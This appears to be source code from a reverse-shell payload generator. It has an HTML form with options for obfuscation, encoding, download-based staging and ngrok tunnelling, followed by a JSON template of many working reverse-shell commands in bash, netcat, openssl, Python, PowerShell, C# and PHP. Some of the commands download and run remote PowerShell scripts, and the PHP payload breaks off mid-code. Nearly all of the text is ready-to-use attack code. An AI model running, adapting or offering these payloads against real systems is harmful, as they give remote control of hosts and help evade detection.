 71 |                 <input placeholder="127.0.0.1" name="host" class="form-control" onkeypress="return event.charCode>=65&&event.charCode<=90||event.charCode>=97&&event.charCode<=122||event.charCode>=48&&event.charCode<=57||45==event.charCode||46==event.charCode||32==event.charCode" maxlength="255" oninput="this.value.length>this.maxLength&&(this.value=this.value.slice(0,this.maxLength))">
 72 |                 <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Port</span></div>
 73 |                 <input type="number" placeholder="44444" name="port" class="form-control" maxlength="5" oninput="this.value.length>this.maxLength&&(this.value=this.value.slice(0,this.maxLength))">
 74 |                 <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Shell Type</span></div>
 75 |                 <select id="shell_type" name="shell_type" class="form-control">
 76 |                     <option value="bash" selected>Bash</option>
 77 |                     <option value="netcat">Netcat</option>
 78 |                     <option value="telnet">Telnet</option>
 79 |                     <option value="openssl">OpenSSL</option>
 80 |                     <option value="python">Python</option>
 81 |                     <option value="powershell">PowerShell</option>
 82 |                     <option value="csharp">C#</option>
 83 |                     <option value="php">PHP</option>
 84 |                     <option value="ruby">Ruby</option>
 85 |                     <option value="socat">Socat</option>
 86 |                     <option value="golang">Golang</option>
 87 |                     <option value="perl">Perl</option>
 88 |                     <option value="java">Java</option>
 89 |                     <option value="nodejs">NodeJS</option>
 90 |                     <option value="lua">Lua</option>
 91 |                 </select>
 92 |                 <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Platform</span></div>
 93 |                 <select id="platform" name="platform" class="form-select">
 94 |                     <option value="linux" selected>Linux</option>
 95 |                     <option value="windows">Windows</option>
 96 |                 </select>
 97 |                 <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Password</span></div>
 98 |                 <input name="password" class="form-control" onkeypress="return!(42==event.charCode||60==event.charCode||62==event.charCode||63==event.charCode||124==event.charCode)">
 99 |                 <button style="height:38px;max-width:40px;min-width:40px;padding-left:10px;border:1px solid #ced4da" class="accordion-button collapsed col" type="button" data-bs-toggle="collapse" data-bs-target="#more" aria-expanded="false" aria-controls="more"></button>
100 |             </div>
101 |             <div class="collapse" id="more">
102 |                 <div class="input-group mb-3">
103 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Direction</span></div>
104 |                     <select id="platform" name="direction" class="form-select">
105 |                         <option value="reverse" selected>Reverse</option>
106 |                         <option value="bind">Bind</option>
107 |                     </select>
108 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Protocol</span></div>
109 |                     <select name="protocol" class="form-select">
110 |                         <option value="tcp" selected>TCP</option>
111 |                         <option value="udp">UDP</option>
112 |                         <option value="https">HTTPS</option>
113 |                         <option value="http">HTTP</option>
114 |                         <option value="dns">DNS</option>
115 |                         <option value="icmp">ICMP</option>
116 |                     </select>
117 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Shell Path</span></div>
118 |                     <input placeholder="/bin/sh" name="shell_path" class="form-control" onkeypress="return!(42==event.charCode||60==event.charCode||62==event.charCode||63==event.charCode||124==event.charCode)">
119 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">BinaryName</span></div>
120 |                     <input placeholder="python3.exe" name="binary_name" class="form-control" onkeypress="return!(42==event.charCode||60==event.charCode||62==event.charCode||63==event.charCode||124==event.charCode)">
121 |                 </div>
122 |                 <div class="input-group mb-3">
123 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Interactive Mode</span></div>
124 |                     <select name="interactive_mode" class="form-select">
125 |                         <option value="interactive" selected>Interactive</option>
126 |                         <option value="semi_interactive">Semi-Interactive</option>
127 |                         <option value="non_interactive">Non-Interactive</option>
128 |                     </select>
129 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Encryption</span></div>
130 |                     <select name="encryption" class="form-select">
131 |                         <option selected></option>
132 |                         <option value="ssl">SSL</option>
133 |                         <option value="aes">AES</option>
134 |                     </select>
135 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">StagingUrl</span></div>
136 |                     <select id="staging_url" name="staging_url" class="form-select">
137 |                         <option selected></option>
138 |                         <option value="0">https://tcp.st</option>
139 |                         <option value="1">https://oshi.at</option>
140 |                         <option value="2">https://temp.sh</option>
141 |                         <option value="3">https://ip.fi</option>
142 |                         <option value="4">https://sicp.me</option>
143 |                         <option value="5">https://transfer.sh</option>
144 |                         <option value="6">https://dpaste.com</option>
145 |                         <option value="7">https://termbin.com</option>
146 |                         <option value="8">https://teknik.io</option>
147 |                         <option value="9">https://toptal.com</option>
148 |                         <option value="10">https://centos.org</option>
149 |                     </select>
150 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">StagingCmd</span></div>
151 |                     <select id="staging_cmd" name="staging_cmd" class="form-select">
152 |                         <option value="0" selected>curl</option>
153 |                         <option value="1">wget</option>
154 |                         <option value="2">jrunscript</option>
155 |                         <option value="3">bitsadmin</option>
156 |                         <option value="4">certutil</option>
157 |                         <option value="5">powershell-Invoke-WebRequest</option>
158 |                         <option value="6">powershell-curl</option>
159 |                         <option value="7">powershell-wget</option>
160 |                         <option value="8">powershell-bitstransfer</option>
161 |                         <option value="9">powershell-DownloadString</option>
162 |                         <option value="10">powershell-DownloadFile</option>
163 |                         <option value="11">certoc.exe</option>
164 |                         <option value="12">GfxDownloadWrapper.exe</option>
165 |                         <option value="13">hh.exe</option>
166 |                         <option value="14">lwp-download</option>
167 |                     </select>
168 |                 </div>
169 |                 <div class="input-group mb-3">
170 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Encoder</span></div>
171 |                     <select data-placeholder="base64, hex, xor, gzip, url..." multiple name="encoder[]" class="chosen-select">
172 |                         <option value="base64">base64_cmd</option>
173 |                         <option value="base64-c">base64_code</option>
174 |                         <option value="hex">hex_cmd</option>
175 |                         <option value="hex-c">hex_code</option>
176 |                         <option value="xor">xor_cmd</option>
177 |                         <option value="xor-c">xor_code</option>
178 |                         <option value="rot13-c">rot13_code</option>
179 |                         <option value="gzip">gzip</option>
180 |                         <option value="bzip2">bzip2</option>
181 |                         <option value="url">url</option>
182 |                     </select>
183 |                 </div>
184 |                 <div class="input-group mb-3">
185 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Obfuscator</span></div>
186 |                     <select name="obfuscator" class="form-select">
187 |                         <option selected></option>
188 |                         <option value="replace_char">ReplaceChar</option>
189 |                         <option value="reverse">ReverseCMD</option>
190 |                     </select>
191 |                     <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">IPObfuscator</span></div>
192 |                     <select name="ip_obfuscator" class="form-select">
193 |                         <option selected></option>
194 |                         <option value="ip2int">ip2int</option>
195 |                         <option value="ip2oct">ip2oct</option>
196 |                         <option value="ip2hex">ip2hex</option>
197 |                     </select>
198 |                     <div class="input-group-prepend localtunnel"><span class="input-group-text" id="inputGroup-sizing-default">localtunnel</span></div>
199 |                     <select id="localtunnel" name="localtunnel" class="form-select">
200 |                         <option selected></option>
201 |                         <option value="ngrok_us">Ngrok-us</option>
202 |                         <option value="ngrok_eu">Ngrok-eu</option>
203 |                         <option value="ngrok_ap">Ngrok-ap</option>
204 |                         <option value="ngrok_au">Ngrok-au</option>
205 |                         <option value="ngrok_sa">Ngrok-sa</option>
206 |                         <option value="ngrok_jp">Ngrok-jp</option>
207 |                         <option value="ngrok_in">Ngrok-in</option>
208 |                         <option value="ng_close">Shutdown Ngrok</option>
209 |                     </select>
210 |                 </div>
211 |             </div>
212 |         </form>
213 |         <div class="input-group mb-3">
214 |             <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Test Terminal</span></div>
215 |             <select id="terminal_id" name="terminal" class="form-select">
216 |                 <option selected></option>
217 |                 <option value="1">terminal-1</option>
218 |                 <option value="2">terminal-2</option>
219 |                 <option value="3">terminal-3</option>
220 |                 <option value="4">...</option>
221 |                 <option value="5">...</option>
222 |                 <option value="6">...</option>
223 |             </select>
224 |         </div>
225 |         <div id="content">
226 |             <ul class="nav nav-tabs" id="tabs" role="tablist">
227 |                 <li class="nav-item"><a class="nav-link active" id="tab-list" data-bs-toggle="tab" href="#output" role="tab" aria-controls="output" aria-selected="true">Output</a></li>
228 |             </ul>
229 |             <div class="tab-content">
230 |                 <div id="output" class="tab-pane fade show active" role="tabpanel" aria-labelledby="output-tab">
231 |                     <div id="output-title" class="text-info bg-dark"></div>
232 |                     <div id="output-data"></div>
233 |                 </div>
234 |             </div>
235 |         </div>
236 |         <script>
237 |             document.getElementById("shell_type").addEventListener("change", function() {
238 |                 "powershell" == this.value ? document.getElementById("platform").value = "windows" : "bash" == this.value && (document.getElementById("platform").value = "linux")
239 |             });
240 |             $(".chosen-select").chosen({
241 |                 no_results_text: "Oops, nothing found!",
242 |                 width: "700px"
243 |             });
244 |             async function gen(t) {
245 |                 const e = await fetch(t, {
246 |                     method: "POST",
247 |                     body: new FormData(form)
248 |                 });
249 |                 t = await e.text();
250 |                 t && (t = JSON.parse(t), $("#output-title").html(t.t), $("#output-data").html(t.r))
251 |             };
252 |             document.getElementById("terminal_id").addEventListener("change", function() {
253 |                 var t, e, n;
254 |                 this.value && (t = "terminal-" + this.value, e = "terminal_" + this.value, $("#tabs").append($('<li class="nav-item"><a class="nav-link" href="#' + e + '" role="tab" data-bs-toggle="tab">' + t + '<button class="close" type="button" title="Close this page">×</button></a></li>')), 1 == this.value ? n = "https://console.python.org/python-dot-org-console/" : 2 == this.value ? n = "https://www.programiz.com/python-programming/online-compiler/" : 3 == this.value && (n = "https://httpie.io/cli/run"), $('<div class="tab-pane fade" id="' + e + '"><div class="row"><div class="col"><a class="btn btn-light btn-sm float-left" data-bs-toggle="collapse" href="#tips" role="button" aria-expanded="false" aria-controls="tips">Help</a><div class="collapse" id="tips"><div class="card card-body">Python into the bash: <pre>__import__("pty").spawn("/bin/sh")<br>__import__("os").system("bash -i")</pre></div></div></div><div class="col"><input class="btn btn-light btn-sm float-end" type="button" id="reload" value="Reload" /></div></div><iframe id="' + e + '" style="border: none; width: 100%;min-height: 500px;" name="terminal1btn" class="embed-responsive-item" allowfullscreen src="' + n + '"></iframe></div>').appendTo(".tab-content"), $("#tabs a[href=#" + e + "]").tab("show"), $("#reload").click(function() {
255 |                     document.querySelector(".embed-responsive-item").src += ""
256 |                 }))
257 |             }), $("form").on("keyup change", function(t) {
258 |                 t.preventDefault();
259 |                 t = document.querySelector("#tab-list");
260 |                 new bootstrap.Tab(t).show(), gen("/gen")
261 |             }), $(document).ready(function() {
262 |                 $("#tabs").on("click", ".close", function() {
263 |                     var t = $(this).parents("a").attr("href");
264 |                     $(this).parents("li").remove(), $(t).remove(), $("#tabs a:first").tab("show")
265 |                 });
266 |                 document.getElementById("tabs")
267 |             });
268 |         </script>
269 |     </div>
270 | </body>
271 | 
272 | </html>


--------------------------------------------------------------------------------
/payloads_template.json:
--------------------------------------------------------------------------------
  1 | {
  2 |   "reverse": {
  3 |     "bash": {
  4 |       "Bash-i": "{shell_path} -i >& /dev/{protocol}/{host}/{port} 0>&1",
  5 |       "Bash-l": "{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1",
  6 |       "Bash-p": "{shell_path} -p >& /dev/{protocol}/{host}/{port} 0>&1",
  7 |       "Bash-c": "{shell_path} -c '{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1'",
  8 |       "Bash196": "0<&196;exec 196<>/dev/{protocol}/{host}/{port}; sh <&196 >&196 2>&196",
  9 |       "Bash-readline": "exec 5<>/dev/{protocol}/{host}/{port}; while read line 0<&5; do $line 2>&5 >&5; done",
 10 |       "Bash5": "{shell_path} -i 5<> /dev/{protocol}/{host}/{port} 0<&5 1>&5 2>&5",
 11 |       "zsh": "zsh -c 'zmodload zsh/net/tcp && ztcp {host} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
 12 |     },
 13 |     "bash-password": {
 14 |       "Bash-i": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' >& /dev/{protocol}/{host}/{port} 0>&1",
 15 |       "Bash-l": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -l;esac' >& /dev/{protocol}/{host}/{port} 0>&1",
 16 |       "Bash-p": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -p;esac' >& /dev/{protocol}/{host}/{port} 0>&1"
 17 |     },
 18 |     "bash-ssl": {
 19 |       "Bash-i": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f",
 20 |       "Bash-l": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -l 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f",
 21 |       "Bash-p": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -p 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f"
 22 |     },
 23 |     "bash-ssl-password": {
 24 |       "Bash-i": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac'  2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f",
 25 |       "Bash-l": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -l;esac'  2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f",
 26 |       "Bash-p": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -p;esac'  2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f"
 27 |     },
 28 |     "netcat": {
 29 |       "nc": "{binary_name} -e {shell_path} {host} {port}{nc_args}",
 30 |       "nc-c": "{binary_name} {host} {port} -c {shell_path}{nc_args}",
 31 |       "ncat": "ncat -e {shell_path} {host} {port}{ncat_args}",
 32 |       "ncat-c": "ncat -c {shell_path} {host} {port}{ncat_args}",
 33 |       "nc-mkfifo": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} {host} {port} >/tmp/f",
 34 |       "nc-mknod": "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} {host} {port} >/tmp/f",
 35 |       "DotnetCat": "dncat -e {shell_path} {host} -p {port}"
 36 |     },
 37 |     "netcat-windows": {
 38 |       "nc": "{binary_name} -e {shell_path} {host} {port}{nc_args}",
 39 |       "nc-c": "{binary_name} {host} {port} -c {shell_path}{nc_args}",
 40 |       "ncat": "ncat -e {shell_path} {host} {port}{ncat_args}",
 41 |       "ncat-c": "ncat -c {shell_path} {host} {port}{ncat_args}",
 42 |       "DotnetCat": "dncat -e {shell_path} {host} -p {port}"
 43 |     },
 44 |     "netcat-password": {
 45 |       "nc-c": "nc -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}",
 46 |       "ncat-c": "ncat -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}",
 47 |       "nc-mkfifo": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}')bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f",
 48 |       "nc-mknod": "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in \"{password}\")bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f"
 49 |     },
 50 |     "netcat-ssl": {
 51 |       "ncat": "ncat -e {shell_path} {host} {port} --ssl",
 52 |       "ncat-c": "ncat -c {shell_path} {host} {port} --ssl"
 53 |     },
 54 |     "netcat-ssl-password": {
 55 |       "ncat-c": "ncat --ssl -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}"
 56 |     },
 57 |     "netcat-windows-password": {
 58 |       "ncat-c": "{binary_name}{ncat_args} -c \"echo|set /p=%random%=&powershell $k=Read-Host;write-host $k=;if($k -eq '{password}'){{{shell_path}}}\" {host} {port}"
 59 |     },
 60 |     "telnet-linux": {
 61 |       "telnet": "rm -f /tmp/p;mknod /tmp/p p && {binary_name} {host} {port} 0/tmp/p",
 62 |       "telnet-two_ports": "{binary_name} {host} {port}|{shell_path}|telnet {host} {port2}"
 63 |     },
 64 |     "openssl-linux": {
 65 |       "openssl": "mkfifo /tmp/s;{shell_path} -i </tmp/s 2>&1|{binary_name} s_client -quiet -connect {host}:{port}>/tmp/s;rm /tmp/s",
 66 |       "openssl-2": "mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect {host}:{port} > fifo; rm fifo"
 67 |     },
 68 |     "python": {
 69 |       "python": "{binary_name} -c \"import socket,threading as t,subprocess as s;c=socket.socket();c.connect(('{host}',{port}));p=s.Popen('{shell_path}',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) for _ in iter(int,1)],).start();p.wait()\"",
 70 |       "python-exec": "{binary_name} -c \"exec('import os,socket,threading as t,subprocess as s\\ndef i():\\n while 1:\\n  try:\\n   p.stdin.write(c.recv(1024).decode());p.stdin.flush()\\n  except:\\n   os._exit(0)\\ndef j():\\n while 1:\\n  try:c.send(p.stdout.read(1).encode())\\n  except:pass\\nc=socket.socket()\\np=s.Popen(\\'{shell_path}\\',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\\nfor _ in range(9):\\n try:\\n  c.connect((\\'{host}\\',{port}));break\\n except:\\n  pass\\nt.Thread(target=i,).start();t.Thread(target=j,).start()\\np.wait()')\"",
 71 |       "python-pty": "{binary_name} -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{host}',{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('{shell_path}')\"",
 72 |       "python-pty-short": "{binary_name} -c \"a=__import__;s=a('socket');o=a('os').dup2;p=a('pty').spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(('{host}',{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p('{shell_path}')\"",
 73 |       "python-subprocess1": "{binary_name} -c \"socket=__import__('socket');subprocess=__import__('subprocess');os=__import__('os');s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{host}',{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['{shell_path}','-i'])\"",
 74 |       "python-subprocess2": "{binary_name} -c \"a=__import__;b=a('socket').socket;p=a('subprocess').call;o=a('os').dup2;s=b();s.connect(('{host}',{port}));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(['{shell_path}','-i'])\"",
 75 |       "pwncat": "pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}"
 76 |     },
 77 |     "python-windows": {
 78 |       "python": "{binary_name} -c \"import socket,threading as t,subprocess as s;c=socket.socket();c.connect(('{host}',{port}));p=s.Popen('{shell_path}',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) for _ in iter(int,1)],).start();p.wait()\"",
 79 |       "python-exec": "{binary_name} -c \"exec('import os,socket,threading as t,subprocess as s\\ndef i():\\n while 1:\\n  try:\\n   p.stdin.write(c.recv(1024).decode());p.stdin.flush()\\n  except:\\n   os._exit(0)\\ndef j():\\n while 1:\\n  try:c.send(p.stdout.read(1).encode())\\n  except:pass\\nc=socket.socket()\\np=s.Popen(\\'{shell_path}\\',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\\nfor _ in range(9):\\n try:\\n  c.connect((\\'{host}\\',{port}));break\\n except:\\n  pass\\nt.Thread(target=i,).start();t.Thread(target=j,).start()\\np.wait()')\"",
 80 |       "pwncat": "pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}"
 81 |     },
 82 |     "powershell": {
 83 |       "powershell-1": "{binary_name} /nop /c \"$client=New-Object System.Net.Sockets.TCPClient('{host}',{port});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{{0}};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){{;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2= $sendback+'PS '+(pwd).Path+'>';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\"",
 84 |       "powershell-2": "{binary_name} /nop /noni /ep bypass /c \"$TCPClient=New-Object Net.Sockets.TCPClient('{host}',{port});$NetworkStream=$TCPClient.GetStream();$StreamWriter=New-Object IO.StreamWriter($NetworkStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+'>');$StreamWriter.Flush()}}WriteToStream'';while(($BytesRead=$NetworkStream.Read($Buffer,0,$Buffer.Length)) -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer, 0,$BytesRead-1);$Output=try{{Invoke-Expression $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()\"",
 85 |       "powershell-ssl": "{binary_name} /nop /noni /ep bypass /c \"$TCPClient=New-Object Net.Sockets.TCPClient('{host}',{port});$NetworkStream=$TCPClient.GetStream();$SslStream=New-Object Net.Security.SslStream($NetworkStream,$false,({{$true}} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned){{$SslStream.Close();exit}}$StreamWriter=New-Object IO.StreamWriter($SslStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+'>');$StreamWriter.Flush()}};WriteToStream'';while(($BytesRead=$SslStream.Read($Buffer,0,$Buffer.Length)) -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer,0,$BytesRead-1);$Output=try{{Invoke-Expression $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()\"",
 86 |       "powershell-ConPty": "{binary_name} \"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing);Invoke-ConPtyShell {host} {port}\"",
 87 |       "powercat-Github-1": "{binary_name} \"IEX(IWR https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat -c {host} -p {port} -e {shell_path}\"",
 88 |       "powercat-Github-2": "{binary_name} \"IEX(curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat -c {host} -p {port} -e {shell_path}\"",
 89 |       "powercat-Github-3": "{binary_name} \"IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c {host} -p {port} -e {shell_path}\""
 90 |     },
 91 |     "csharp": {
 92 |       "csharp-csc": "echo using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect(\"{host}\",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName=\"{shell_path}\";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}>%tmp%\\0&&for,/f,%p,in,('where,/r,%systemroot%\\Microsoft.NET\\Framework,csc.exe'),do,%p /out:%tmp%\\0.exe %tmp%\\0&&%tmp%\\0.exe&&del,/q %tmp%\\0.exe %tmp%\\0",
 93 |       "csharp-powershell-code": "$j=get-random;$d=@\"\nusing System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i$j{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect(\"{host}\",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName=\"{shell_path}\";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}\n\"@;Add-Type -TypeDefinition $d -Language CSharp;iex \"[i$j]::Main()\""
 94 |     },
 95 |     "php": {
 96 |       "php-exec": "{binary_name} -r \"$sock=fsockopen('{host}',{port});exec('{shell_path} <&3 >&3 2>&3');\"",
 97 |       "php-shell_exec": "{binary_name} -r \"$sock=fsockopen('{host}',{port});shell_exec('{shell_path} <&3 >&3 2>&3');\"",
 98 |       "php-system": "{binary_name} -r \"$sock=fsockopen('{host}',{port});system('{shell_path} -i <&3 >&3 2>&3');\"",
 99 |       "php-passthru": "{binary_name} -r \"$sock=fsockopen('{host}',{port});passthru('{shell_path} -i <&3 >&3 2>&3');\"",
100 |       "php-popen": "{binary_name} -r \"$sock=fsockopen('{host}',{port});popen('{shell_path} -i <&3 >&3 2>&3\",'r');\"",
101 |       "php-proc_open": "{binary_name} -r \"$sock=fsockopen('{host}',{port});$proc=proc_open('{shell_path}',array(0=>$sock,1=>$sock,2=>$sock),$pipes);\"",
102 |       "php-backtick": "{binary_name} -r \"$sock=fsockopen('{host}',{port});`{shell_path} <&3 >&3 2>&3`;\"",
103 |       "php-code": "<?php class S{{private $addr=null;private $port=null;private $os=null;private $s=null;private $descriptorspec=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private function detect(){{$detected=true;if(stripos(PHP_OS,'LINUX')!==false){{$this->os='LINUX';$this->s='/bin/sh';}}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){{$this->os='WINDOWS';$this->s='cmd.exe';}}else{{$detected=false;}}return $detected;}}private function daemonize(){{$exit=false;if(!function_exists('pcntl_fork')){{}}else if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private function dump($data){{$data=str_replace('<','&lt;',$data);$data=str_replace('>','&gt;',$data);}}private function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os==='WINDOWS'&&$oname==='STDIN'){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private function 